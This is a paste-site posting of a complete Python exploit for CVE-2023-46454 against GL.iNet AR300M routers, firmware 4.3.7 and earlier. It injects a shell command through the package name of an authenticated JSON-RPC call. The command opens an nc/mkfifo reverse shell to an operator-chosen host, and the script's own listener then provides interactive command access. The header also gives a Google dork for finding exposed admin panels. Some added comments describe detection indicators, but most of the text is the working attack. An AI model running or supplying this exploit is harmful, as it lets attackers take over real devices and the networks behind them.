FlyFar

GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454

Mar 6th, 2024
  1. #!/usr/bin/env python3
  2.  
  3. # Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client
  4. # Google Dork: intitle:"GL.iNet Admin Panel"
  5. # Date: XX/11/2023
  6. # Exploit Author: Michele 'cyberaz0r' Di Bonaventura
  7. # Vendor Homepage: https://www.gl-inet.com
  8. # Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
  9. # Version: 4.3.7
  10. # Tested on: GL.iNet AR300M
  11. # CVE: CVE-2023-46454
  12.  
  13. import socket
  14. import requests
  15. import readline
  16. from time import sleep
  17. from random import randint
  18. from sys import stdout, argv
  19. from threading import Thread
  20.  
# Silence urllib3's InsecureRequestWarning: trigger_revshell posts with
# verify=False, so the device's TLS certificate is never validated.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
  22.  
def trigger_revshell(url, auth_token, payload):
    """Send the authenticated JSON-RPC request that carries the injected command.

    The request is a ``call`` to ``plugins`` / ``get_package_info`` with the
    package ``name`` set to ``bas<payload>e-files``; ``main`` passes a
    ``$( ... )`` command substitution as *payload*, so the ``name`` argument is
    the injection point.  From a detection standpoint this is the request to
    alert on: a JSON-RPC ``get_package_info`` call to ``/rpc`` whose ``name``
    contains shell metacharacters.  The call carries *auth_token* as its first
    parameter, i.e. it is made post-authentication.

    Args:
        url: JSON-RPC endpoint (``main`` passes ``<base_url>/rpc``).
        auth_token: session token placed first in ``params``.
        payload: string spliced into the package name.

    Returns:
        None; the HTTP response is discarded.
    """
    # Short delay before posting, presumably so the listener that main binds
    # on the main thread is ready first -- there is no real synchronisation.
    sleep(0.25)
    data = {
        'jsonrpc': '2.0',
        'id': randint(1000, 9999),  # arbitrary request id
        'method': 'call',
        'params': [
            auth_token,
            'plugins',
            'get_package_info',
            {'name': 'bas{}e-files'.format(payload)}
        ]
    }
    # verify=False: no TLS certificate validation (warning silenced at module level).
    requests.post(url, json=data, verify=False)
  37.  
def get_command_response(s):
    """Read output from the connected socket *s* until it goes quiet.

    Reads one byte at a time and appends the UTF-8 decoded byte to the
    result.  The loop ends only when ``s.recv`` raises ``socket.timeout``
    (``revshell_listen`` sets a 2 s timeout on the accepted socket), so every
    call blocks for at least that long after the last byte arrives.

    Args:
        s: a connected socket with a timeout set.

    Returns:
        str: the accumulated decoded output.
    """
    res = ''
    while True:
        try:
            resp = s.recv(1).decode('utf-8')
            res += resp
        except UnicodeDecodeError:
            # A single byte of a multi-byte UTF-8 sequence never decodes on
            # its own, so non-ASCII output is silently dropped here.
            pass
        except socket.timeout:
            # Peer silent for the socket's timeout: treat as end of output.
            # NOTE(review): if the peer closes the connection, recv() returns
            # b'' immediately instead of timing out, so this loop would spin
            # forever -- there is no EOF check.
            break
    return res
  49.  
def revshell_listen(revshell_ip, revshell_port):
    """Bind a TCP listener and run an interactive loop with the first client.

    Waits up to 5 s (the listening socket's timeout) for one connection,
    then loops forever: prompts for a command, sends it newline-terminated,
    and writes whatever ``get_command_response`` collects to stdout.  The
    loop has no normal exit; it ends on Ctrl-C (``KeyboardInterrupt``),
    which closes both sockets.  A bind/listen failure exits the process
    with status 1.

    Args:
        revshell_ip: address to bind.
        revshell_port: port to bind; converted with ``int`` here, so a
            non-numeric value raises ``ValueError`` inside the bind ``try``
            and is reported as a bind failure.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)  # bounds accept() below: how long to wait for the connect-back

    try:
        s.bind((revshell_ip, int(revshell_port)))
        s.listen(1)
    except Exception as e:
        # Only the exception class name is reported; the message is dropped.
        print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
        exit(1)

    try:
        clsock, claddr = s.accept()
        clsock.settimeout(2)  # per-recv timeout relied on by get_command_response
        if clsock:  # always true once accept() has returned
            print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
            res = ''  # unused
            while True:
                command = input('$ ')
                clsock.sendall('{}\n'.format(command).encode('utf-8'))
                stdout.write(get_command_response(clsock))

    except socket.timeout:
        # Reached when accept() times out after 5 s.  A timeout raised by
        # clsock.sendall (2 s) would land here too and print the same,
        # then-misleading, message.
        print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
        s.close()

    except KeyboardInterrupt:
        print('\n[*] Closing connection')
        try:
            clsock.close()
        except socket.error:
            pass
        except NameError:
            # Ctrl-C arrived before accept() returned, so clsock was never bound.
            pass
        s.close()
  85.  
def main(base_url, auth_token, revshell_ip, revshell_port):
    """Run the exploit end to end: post the request on a thread, then listen.

    The injected command is a ``$( ... )`` substitution that removes and
    recreates a FIFO at ``/tmp/f`` and pipes ``sh -i`` through ``nc`` back
    to ``revshell_ip:revshell_port``.  On the device those are the
    observable artifacts for a defender: the FIFO in ``/tmp``, an
    interactive ``sh`` and ``nc`` presumably spawned under the RPC handler
    process, and an outbound TCP connection from the router to the listener.

    Args:
        base_url: target origin; ``/rpc`` is appended for the JSON-RPC call.
        auth_token: authenticated session token passed to the RPC.
        revshell_ip: address the device connects back to, and the bind address.
        revshell_port: port the device connects back to, and the bind port.
    """
    print('[+] Started GL.iNet <= 4.3.7 RCE exploit')

    payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)
    print('[+] Reverse shell payload: "{}"'.format(payload))

    print('[*] Triggering reverse shell connection')
    # Posted from a thread so the listener below can be bound while the
    # request is in flight; trigger_revshell sleeps 0.25 s before posting.
    Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()

    print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
    # Blocks until Ctrl-C or until accept() times out.
    revshell_listen(revshell_ip, revshell_port)

    print('[+] Done')
  99.  
if __name__ == '__main__':
    # Positional CLI: target URL, session token, listener address and port.
    # Extra arguments beyond the four are ignored.
    if len(argv) < 5:
        print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
        exit(1)

    main(argv[1], argv[2], argv[3], argv[4])